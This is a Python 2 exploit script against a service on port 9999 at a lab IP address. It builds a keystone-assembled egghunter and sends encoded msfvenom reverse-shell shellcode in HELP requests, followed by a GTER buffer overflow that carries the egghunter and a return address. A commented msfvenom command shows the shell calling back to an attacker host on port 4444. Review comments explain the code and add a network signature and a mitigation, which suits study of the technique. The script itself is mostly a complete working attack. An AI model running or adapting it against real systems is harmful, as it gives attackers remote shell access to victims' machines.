import socket
import sys
import struct
import hexdump
from keystone import *
# Lab target.  Host and port are hard-coded and nothing below checks that the
# service answering on 9999 is the one this script was written against.
host = "192.168.112.133"
port = 9999
# 32-bit x86 assembly source, assembled with keystone further down.  It is a
# memory-search routine: 0x57303054 is "T00W" in little-endian byte order,
# i.e. half of the "T00WT00W" marker that prefixes `buf` below, and the two
# consecutive `scasd` compares require the marker twice before `jmp edi`.
# The `cs` test at `check:` picks one of two probe paths (`egg_32` via
# `int 0x2e`, `egg_64` via the `fs:` call); the `cmp al,0x5` at `egg_end`
# looks like the "keep scanning" decision after each probe — confirm.
# NOTE(review): left as a plain literal on purpose; assembler comments inside
# the string would change the text handed to ks.asm().
CODE = """
check:
mov bx,cs
cmp bl, 0x23
jnz egg
stub:
xor ebx,ebx
push ebx
push ebx
push ebx
push ebx
mov bl,0xc0
egg:
or dx,0x0fff
egg1:
inc edx
push edx
cmp bl, 0xc0
je egg_64
egg_32:
push 0x2
pop eax
int 0x2e
pop edx
egg_end:
cmp al,0x5
je egg
mov eax, 0x57303054
mov edi,edx
scasd
jnz egg1
scasd
jnz egg1
jmp edi
egg_64:
push 0x38
pop eax
xor ecx, ecx
mov edx, esp
call dword ptr fs:[ebx]
pop ecx
pop edx
jmp egg_end
"""
# Assemble CODE to machine code.  On KsError the script only prints and falls
# through (the sys.exit below is commented out), so `encoded_egghunter` stays
# unbound and the `buffer +=` line further down fails with a NameError rather
# than a clear assembly error.  `"".join(map(chr, ...))` and the `xrange` loop
# at the end tie this file to Python 2 byte-string semantics.
try:
    ks = Ks(KS_ARCH_X86, KS_MODE_32)
    encoding, count = ks.asm(CODE)
    #print("%s = %s (number of statements: %u)" %(CODE, encoding, count))
    encoded_egghunter = "".join(map(lambda x: chr(x) , encoding))
    #hexdump.hexdump(encoded_egghunter)
except KsError as e:
    print("ERROR: %s" %e)
    #open("egghunter.bin", "wb").write(encoded_egghunter)
    #sys.exit(-1)
#pattern = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq'
# Stage-1 payload: the 8-byte "T00WT00W" marker the routine above searches
# for, followed by msfvenom output (the generating command is recorded in the
# comment below).  It is sent five times in the loop at the bottom, presumably
# so copies remain resident when the second request arrives — not verified.
buf = "HELP T00WT00W"
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.112.134 LPORT=4444 EXITFUNC=thread -b "\x00\x0a\0x0d" -f python -o shell.txt
buf += "\xbf\xc7\x2e\x68\x73\xda\xc1\xd9\x74\x24\xf4\x58\x33"
buf += "\xc9\xb1\x52\x31\x78\x12\x03\x78\x12\x83\x2f\xd2\x8a"
buf += "\x86\x53\xc3\xc9\x69\xab\x14\xae\xe0\x4e\x25\xee\x97"
buf += "\x1b\x16\xde\xdc\x49\x9b\x95\xb1\x79\x28\xdb\x1d\x8e"
buf += "\x99\x56\x78\xa1\x1a\xca\xb8\xa0\x98\x11\xed\x02\xa0"
buf += "\xd9\xe0\x43\xe5\x04\x08\x11\xbe\x43\xbf\x85\xcb\x1e"
buf += "\x7c\x2e\x87\x8f\x04\xd3\x50\xb1\x25\x42\xea\xe8\xe5"
buf += "\x65\x3f\x81\xaf\x7d\x5c\xac\x66\xf6\x96\x5a\x79\xde"
buf += "\xe6\xa3\xd6\x1f\xc7\x51\x26\x58\xe0\x89\x5d\x90\x12"
buf += "\x37\x66\x67\x68\xe3\xe3\x73\xca\x60\x53\x5f\xea\xa5"
buf += "\x02\x14\xe0\x02\x40\x72\xe5\x95\x85\x09\x11\x1d\x28"
buf += "\xdd\x93\x65\x0f\xf9\xf8\x3e\x2e\x58\xa5\x91\x4f\xba"
buf += "\x06\x4d\xea\xb1\xab\x9a\x87\x98\xa3\x6f\xaa\x22\x34"
buf += "\xf8\xbd\x51\x06\xa7\x15\xfd\x2a\x20\xb0\xfa\x4d\x1b"
buf += "\x04\x94\xb3\xa4\x75\xbd\x77\xf0\x25\xd5\x5e\x79\xae"
buf += "\x25\x5e\xac\x61\x75\xf0\x1f\xc2\x25\xb0\xcf\xaa\x2f"
buf += "\x3f\x2f\xca\x50\x95\x58\x61\xab\x7e\xa7\xde\xc3\xf8"
buf += "\x4f\x1d\x23\x14\xcc\xa8\xc5\x7c\xfc\xfc\x5e\xe9\x65"
buf += "\xa5\x14\x88\x6a\x73\x51\x8a\xe1\x70\xa6\x45\x02\xfc"
buf += "\xb4\x32\xe2\x4b\xe6\x95\xfd\x61\x8e\x7a\x6f\xee\x4e"
buf += "\xf4\x8c\xb9\x19\x51\x62\xb0\xcf\x4f\xdd\x6a\xed\x8d"
buf += "\xbb\x55\xb5\x49\x78\x5b\x34\x1f\xc4\x7f\x26\xd9\xc5"
buf += "\x3b\x12\xb5\x93\x95\xcc\x73\x4a\x54\xa6\x2d\x21\x3e"
buf += "\x2e\xab\x09\x81\x28\xb4\x47\x77\xd4\x05\x3e\xce\xeb"
buf += "\xaa\xd6\xc6\x94\xd6\x46\x28\x4f\x53\x66\xcb\x45\xae"
buf += "\x0f\x52\x0c\x13\x52\x65\xfb\x50\x6b\xe6\x09\x29\x88"
buf += "\xf6\x78\x2c\xd4\xb0\x91\x5c\x45\x55\x95\xf3\x66\x7c"
# Stage-2 request, a fixed 180-byte line: the "GTER " command, a 3-byte
# prefix the file does not explain, the assembled search routine NOP-padded
# to 148 bytes, one packed 32-bit address, NOP padding to 180, then CRLF.
# Assumes len(encoded_egghunter) <= 148 and len(buffer) <= 180 at the two
# padding lines; neither is asserted, and a negative repeat count silently
# yields "" and shifts every later field.
# Defender's view: one ~180-byte command line that is mostly 0x90 and other
# non-printable bytes, preceded by five short connections carrying the same
# 8-byte marker plus opaque data, is a straightforward network signature.
# Server-side, bounding command length and rejecting non-text bytes before
# any copy into a fixed buffer is the generic mitigation for the bug class
# a request shaped like this targets.
buffer = "GTER "
buffer += "\xE4\x89\xca"
buffer += encoded_egghunter
buffer += "\x90" * (148 - len(encoded_egghunter))
buffer += struct.pack("<L", 0x625011b1)
buffer += "\x90" * (180 - len(buffer))
buffer += "\r\n"
# Deliver stage 1 five times on fresh connections, then stage 2 once.
# Each recv() result is discarded (the banner is never checked), no socket
# timeout is set, and a failing connect()/send() leaves the socket open —
# a try/finally around close() would be the robust form here.
for _ in xrange(5):
    egg = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    egg.connect((host, port))
    egg.recv(1024)
    egg.send(buf)
    egg.close()
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.recv(1024)
expl.send(buffer)
expl.close()